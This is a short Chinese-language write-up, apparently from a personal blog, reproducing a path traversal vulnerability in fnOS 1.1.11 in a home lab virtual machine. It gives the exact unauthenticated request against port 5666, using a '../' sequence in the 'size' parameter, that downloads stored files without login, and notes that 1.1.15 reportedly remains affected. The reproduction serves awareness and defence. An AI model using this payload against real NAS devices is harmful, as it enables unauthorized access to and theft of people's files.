听闻飞牛OS出现路径穿越漏洞,想自己复现一下,因为我的飞牛已经升级到1.1.15版本,所以需要手动下载一个上一个版本1.1.11版本,下载链接:https://oss-hk.hozoy.cn/iso/fnos-1.1.11-1438.iso

我这边用飞牛的虚拟机功能新建一个飞牛的虚拟机:

使用2G、2核的配置,然后分配2个磁盘,一个是用于系统安装,一个是用于资料存储

然后启动安装,注意要使用第二个安装选项,图形化的安装选项无法正常运行。

然后去上级路由器查看多的设备接入ip:

然后进入ip,直接初始化配置,新建存储空间。

然后创一个文件夹,并塞进去一个文件

然后开一个无痕浏览器,使用

1
http://IP:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000 + 文件夹

然后就可以看到你存放的文件

例如我的使用http://192.168.1.166:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/123/game.zip就可以直接下载文件,无需登录。

复现完毕。

据说15版本仍然有bug,15版本立刻公网关闭访问